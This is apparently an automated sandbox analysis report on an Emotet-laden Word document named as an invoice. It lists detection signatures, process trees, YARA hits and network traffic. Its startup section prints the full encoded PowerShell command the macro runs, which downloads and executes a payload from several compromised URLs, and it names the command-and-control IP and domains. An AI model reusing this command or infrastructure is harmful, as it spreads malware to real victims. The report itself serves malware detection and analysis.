Analysis Report Fakturierung_24_09_2020_8415803921.doc

Overview

General Information

Sample Name: Fakturierung_24_09_2020_8415803921.doc
Analysis ID: 289687
MD5: 799f8b65f4144c1a628de3e86198ece4
SHA1: 75067cb881a867d47ff12437db1765c95bd1d9e9
SHA256: 029de7c595a68b46233e28bbff65f065f8baf48178b6998928ebadafb8d3368c
Tags: Heodo

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
PowerShell case anomaly found
Powershell drops PE file
Very long command line found
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 7164 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • powershell.exe (PID: 6580 cmdline: POwersheLL -ENCOD JABLAGIANwBoADcAeQAyAD0AKAAnAEsANQAnACsAKAAnAHUAaQBiADQAJwArACcAOAAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUATgBWADoAVQBTAGUAcgBQAHIAbwBmAEkATABlAFwAWQBnADkAawBfADkAdABcAG8AYQBkADcAMABkAFMAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIARQBDAFQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBgAEMAdQBSAGkAYABUAFkAYABwAFIATwBUAG8AYABjAE8ATAAiACAAPQAgACgAJwB0AGwAJwArACcAcwAxACcAKwAoACcAMgAnACsAJwAsACAAdAAnACkAKwAoACcAbABzADEAMQAnACsAJwAsACAAdAAnACsAJwBsAHMAJwApACkAOwAkAEEAYwBlAHoAawA1ADIAIAA9ACAAKAAnAFgAYQAnACsAJwBnACcAKwAoACcAbgAnACsAJwBhADYAJwArACcAOQB5ADgAJwApACkAOwAkAEgAMgBkAGUAZQA5AHUAPQAoACgAJwBJAGkAJwArACcAMAAnACkAKwAoACcAdQAnACsAJwBiAGsAJwApACsAJwBxACcAKQA7ACQAUABwAHgANgAyAGgAYQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAEQAVQBtACcAKwAnAFkAZwAnACkAKwAoACcAOQAnACsAJwBrAF8AJwApACsAJwA5ACcAKwAoACcAdABEACcAKwAnAFUAbQBPAGEAZAA3ADAAZAAnACsAJwBzACcAKQArACgAJwBEACcAKwAnAFUAbQAnACkAKQAuACIAUgBgAEUAUABMAGEAYwBlACIAKAAoACcARAAnACsAJwBVAG0AJwApACwAWwBzAHQAcgBJAG4AZwBdAFsAYwBoAEEAUgBdADkAMgApACkAKwAkAEEAYwBlAHoAawA1ADIAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABXAGYAbwBrAGoAMgBkAD0AKAAnAFoAJwArACcAMAAnACsAKAAnADgAZgBzAHUAJwArACcAZQAnACkAKQA7ACQATQBzAF8AcQB3AHQAcwA9ACYAKAAnAG4AZQB3AC0AbwBiAGoAJwArACcAZQBjACcAKwAnAHQAJwApACAATgBFAFQALgBXAEUAQgBDAGwAaQBFAG4AVAA7ACQAUQBwADgAdgBrAGYAcwA9ACgAKAAnAGgAJwArACcAdAB0AHAAJwApACsAKAAnADoALwAvACcAKwAnAGYAdQBsACcAKQArACgAJwBmAGkAJwArACcAbABsACcAKQArACcAbQAnACsAKAAnAGUAbgB0ACcAKwAnAGUAbgAnACsAJwB0ACcAKwAnAGUAcgAnACsAJwB0AGEAaQBuAG0AZQBuAHQALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAJwAvACcAKwAoACcAYwBnAGkALQBiACcAKwAnAGkAbgAnACkAKwAoACcALwAnACsAJwBXAHIARAAvACcAKwAnACoAJwApACsAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAcwAnACkAKwAnADoAJwArACgAJwAvAC8AJwArACcAdwB3AHcALgAnACkAKwAoACcAZwBlAHQAdwBhACcAKwAnAHkAaQBtACcAKwAnAG0AJwApACsAJwBpAGcAJwArACgAJwByAGEAdABpACcAKwAnAG8AbgAuAGMAJwArACcAbwBtACcAKwAnAC8AdgBxAGcAJwArACc
AMQAnACsAJwBqADMALwAnACkAKwAnADEAJwArACgAJwBCAHcAJwArACcAYgBaAE4ATgAvACoAJwArACcAaAAnACkAKwAoACcAdAAnACsAJwB0AHAAJwApACsAKAAnADoALwAvACcAKwAnAHYAaQBkAGEAZABvACcAKwAnAGgAbwBtAGUAbQAuAGMAbwAnACsAJwBtAC8AJwApACsAJwB3AHAAJwArACcALQAnACsAJwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACsAJwB0ACcAKwAoACcALwAnACsAJwBPADIAaQByADMAJwApACsAKAAnAHYAeAAvACcAKwAnACoAaAAnACsAJwB0AHQAJwApACsAJwBwADoAJwArACcALwAvACcAKwAnAGEAJwArACgAJwBuACcAKwAnAGEAbAAnACkAKwAnAHkAJwArACgAJwB0AGkAJwArACcAYwAnACkAKwAnAHMAJwArACgAJwBjAG8AcwBtACcAKwAnAC4AJwArACcAYwAnACsAJwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AJwApACsAKAAnAFAAdwAnACsAJwBsACcAKQArACgAJwBNAHkAJwArACcALwAqAGgAdAAnACkAKwAnAHQAJwArACgAJwBwADoAJwArACcALwAnACsAJwAvAHcAdwB3AC4AYQAnACkAKwAnAG4AZwAnACsAKAAnAGkAYQB0ACcAKwAnAGgAJwArACcAaQBuACcAKQArACgAJwBoAC4AJwArACcAYwBvACcAKwAnAG0ALwB3ACcAKQArACcAcAAtACcAKwAoACcAYQBkACcAKwAnAG0AaQBuAC8AJwArACcASwAnACkAKwAnAHAATgAnACsAJwBmAEsAJwArACcALwAqACcAKwAoACcAaAB0AHQAJwArACcAcAA6ACcAKQArACcALwAnACsAKAAnAC8AdAAnACsAJwB3ACcAKwAnAG8AcABhAHIAcgAnACsAJwBvAHQALgBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACgAJwB3ACcAKwAnAHAALQAnACkAKwAoACcAaQBuACcAKwAnAGMAbAB1AGQAZQAnACsAJwBzAC8AJwApACsAJwBzADcAJwArACcAYQBHACcAKwAnAHYAJwArACgAJwAvACcAKwAnACoAJwArACcAaAB0AHQAcAAnACsAJwA6AC8ALwBpAGUAZQBlACcAKwAnAC0AYQBjAHQAcwAuACcAKwAnAGMAbwAnACsAJwBtAC8AJwApACsAKAAnAG0AYQAnACsAJwBpACcAKQArACgAJwBuAHAAJwArACcAYQAnACkAKwAoACcAZwBlAC8AdgAnACsAJwBHAC8AJwApACkALgAiAFMAYABwAGwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASABzAG4AXwBuAGwAMQA9ACgAJwBSACcAKwAnAHEAcgAnACsAKAAnAHkANAAnACsAJwBuADAAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABQAHkAOQBmAHUAMABlACAAaQBuACAAJABRAHAAOAB2AGsAZgBzACkAewB0AHIAeQB7ACQATQBzAF8AcQB3AHQAcwAuACIAZABgAG8AdwBuAGAATABvAEEAZABGAEkAbABFACIAKAAkAFAAeQA5AGYAdQAwAGUALAAgACQAUABwAHgANgAyAGgAYQApADsAJABYAHUAXwAzAGoAdwBlAD0AKAAoACcAUQA0ACcAKwAnAGYAZgAnACsAJwBhAHAAJwApACsAJwBlACcAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABQAHAAeAA2ADIAaABhACkALgAiAEwAYABlAG4ARwB0AGgAIgAgAC0AZwBlACAAMwA1ADIAMAA0ACkAIAB7AC4AKAAnAEkAJwArACc
AbgB2AG8AawBlAC0AJwArACcASQB0AGUAbQAnACkAKAAkAFAAcAB4ADYAMgBoAGEAKQA7ACQAVABqAHQAOQBxAGUAdQA9ACgAKAAnAFQAJwArACcAeAA0AGoAcAAnACkAKwAnAHMAdwAnACkAOwBiAHIAZQBhAGsAOwAkAEEAaQA5AHYAbQAwAHoAPQAoACcAVgAnACsAKAAnAG0AdQAnACsAJwBmAHUAeABqACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAHQAYwBlAHEAMAByAD0AKAAoACcASwBtACcAKwAnAHQAJwApACsAKAAnAF8AbAAnACsAJwBrACcAKQArACcAaQAnACkA MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Xagna69y8.exe (PID: 6068 cmdline: 'C:\Users\user\Yg9k_9t\Oad70ds\Xagna69y8.exe' MD5: 665B60253D9AEBAD942CAC6670594419)
      • RTMediaFrame.exe (PID: 5416 cmdline: C:\Windows\SysWOW64\iedkcs32\RTMediaFrame.exe MD5: 665B60253D9AEBAD942CAC6670594419)
  • svchost.exe (PID: 6920 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5680 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6540 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5308 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6492 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 4280 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6000 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6908 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.470373056.0000000000600000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000004.00000002.220109967.00000000006D1000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000005.00000002.471107407.00000000021B4000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000004.00000002.220261795.0000000002084000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000005.00000002.471152467.00000000021D1000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.Xagna69y8.exe.6d0000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
5.2.RTMediaFrame.exe.21d0000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: fulfillmententertainment.com | Virustotal: Detection: 13%
Source: http://fulfillmententertainment.com/cgi-bin/WrD/ | Virustotal: Detection: 16%
Multi AV Scanner detection for submitted file
Source: Fakturierung_24_09_2020_8415803921.doc | ReversingLabs: Detection: 25%
Machine Learning detection for sample
Source: Fakturierung_24_09_2020_8415803921.doc | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\iedkcs32\RTMediaFrame.exe | Code function: 5_2_021D25C0 CryptCreateHash,CryptGenKey,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptImportKey,LocalFree,5_2_021D25C0
Source: C:\Windows\SysWOW64\iedkcs32\RTMediaFrame.exe | Code function: 5_2_021D2210 CryptExportKey,CryptEncrypt,CryptDestroyHash,GetProcessHeap,RtlAllocateHeap,CryptGetHashParam,memcpy,CryptDuplicateHash,5_2_021D2210
Source: C:\Windows\SysWOW64\iedkcs32\RTMediaFrame.exe | Code function: 5_2_021D1FA0 CryptDuplicateHash,memcpy,CryptVerifySignatureW,CryptDestroyHash,CryptDecrypt,5_2_021D1FA0
Source: C:\Windows\SysWOW64\iedkcs32\RTMediaFrame.exe | Code function: 5_2_021D3810 FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,FindClose,FindClose,5_2_021D3810
Source: global traffic | DNS query: name: fulfillmententertainment.com
Source: global traffic | TCP traffic: 192.168.2.4:49717 -> 208.91.199.181:80
Source: global traffic | TCP traffic: 192.168.2.4:49717 -> 208.91.199.181:80
Source: global traffic | HTTP traffic detected:
    GET /cgi-bin/WrD/ HTTP/1.1
    Host: fulfillmententertainment.com
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 174.106.122.139 174.106.122.139
Source: Joe Sandbox View | ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
Source: global traffic | HTTP traffic detected:
    POST /ZJQGwOVb6As6GLXS/m4SIbRsGYzt8Su8LNC/Sas6zvJy9/BRm4jLBzCUf8z6/NiMNi69PdZS/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: keep-alive
    Referer: 174.106.122.139/ZJQGwOVb6As6GLXS/m4SIbRsGYzt8Su8LNC/Sas6zvJy9/BRm4jLBzCUf8z6/NiMNi69PdZS/
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=--------------------SP0gfURncLtpIKafyjbp
    Host: 174.106.122.139
    Content-Length: 4612
    Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 174.106.122.139
Source: unknown | TCP traffic detected without corresponding DNS query: 174.106.122.139
Source: unknown | TCP traffic detected without corresponding DNS query: 174.106.122.139
Source: unknown | TCP traffic detected without corresponding DNS query: 174.106.122.139
Source: unknown | TCP traffic detected without corresponding DNS query: 174.106.122.139
Source: unknown | TCP traffic detected without corresponding DNS query: 174.106.122.139
Source: unknown | TCP traffic detected without corresponding DNS query: 174.106.122.139
Source: C:\Windows\SysWOW64\iedkcs32\RTMediaFrame.exe | Code function: 5_2_021D2920 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW,5_2_021D2920
Source: global traffic | HTTP traffic detected:
    GET /cgi-bin/WrD/ HTTP/1.1
    Host: fulfillmententertainment.com
    Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: fulfillmententertainment.com
Source: unknown | HTTP traffic detected:
    POST /ZJQGwOVb6As6GLXS/m4SIbRsGYzt8Su8LNC/Sas6zvJy9/BRm4jLBzCUf8z6/NiMNi69PdZS/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: keep-alive
    Referer: 174.106.122.139/ZJQGwOVb6As6GLXS/m4SIbRsGYzt8Su8LNC/Sas6zvJy9/BRm4jLBzCUf8z6/NiMNi69PdZS/
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=--------------------SP0gfURncLtpIKafyjbp
    Host: 174.106.122.139
    Content-Length: 4612
    Cache-Control: no-cache
Source: RTMediaFrame.exe, 00000005.00000002.473218289.0000000002CF0000.00000004.00000001.sdmp, RTMediaFrame.exe, 00000005.00000002.473243315.0000000002CF5000.00000004.00000001.sdmp | String found in binary or memory: http://174.106.122.139/ZJQGwOVb6As6GLXS/m4SIbRsGYzt8Su8LNC/Sas6zvJy9/BRm4jLBzCUf8z6/NiMNi69PdZS/
Source: RTMediaFrame.exe, 00000005.00000002.473218289.0000000002CF0000.00000004.00000001.sdmp | String found in binary or memory: http://174.106.122.139/ZJQGwOVb6As6GLXS/m4SIbRsGYzt8Su8LNC/Sas6zvJy9/BRm4jLBzCUf8z6/NiMNi69PdZS/Y
Source: RTMediaFrame.exe, 00000005.00000002.473218289.0000000002CF0000.00000004.00000001.sdmp | String found in binary or memory: http://174.106.122.139/ZJQGwOVb6As6GLXS/m4SIbRsGYzt8Su8LNC/Sas6zvJy9/BRm4jLBzCUf8z6/NiMNi69PdZS/e
Source: svchost.exe, 0000000A.00000002.472449921.000002A34EE14000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: svchost.exe, 0000000A.00000002.472449921.000002A34EE14000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 0000000A.00000002.472800789.000002A34EE9F000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: svchost.exe, 0000000A.00000002.472883063.000002A34F000000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: svchost.exe, 0000000D.00000002.303900237.000002041B613000.00000004.00000001.sdmp | String found in binary or memory: http://www.bingmapsportal.com
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://api.aadrm.com/
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://api.diagnostics.office.com
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://api.microsoftstream.com/api/
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://api.office.net
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://api.onedrive.com
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://apis.live.net/v5.0/
Source: svchost.exe, 0000000D.00000003.303701495.000002041B661000.00000004.00000001.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://augloop.office.com
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://cdn.entity.
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://clients.config.office.net/
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://config.edge.skype.com
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://cortana.ai
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://cr.office.com
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://dataservice.o365filtering.com
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://dataservice.o365filtering.com/
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: svchost.exe, 0000000D.00000003.303716565.000002041B65A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000D.00000003.303716565.000002041B65A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000D.00000003.303701495.000002041B661000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000D.00000002.303932710.000002041B63D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000D.00000003.303716565.000002041B65A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000D.00000003.303701495.000002041B661000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000D.00000003.303677764.000002041B649000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: svchost.exe, 0000000D.00000003.303716565.000002041B65A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000D.00000003.303701495.000002041B661000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000D.00000002.303932710.000002041B63D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000D.00000003.303701495.000002041B661000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000D.00000003.303701495.000002041B661000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000D.00000003.303701495.000002041B661000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000D.00000003.303753706.000002041B641000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000D.00000003.303753706.000002041B641000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000D.00000003.303701495.000002041B661000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000D.00000003.303731458.000002041B640000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://devnull.onenote.com
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://directory.services.
Source: svchost.exe, 0000000D.00000003.303716565.000002041B65A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000D.00000003.303716565.000002041B65A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000D.00000003.303716565.000002041B65A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000D.00000003.303677764.000002041B649000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000D.00000003.303701495.000002041B661000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000D.00000002.303932710.000002041B63D000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000D.00000003.281922391.000002041B632000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
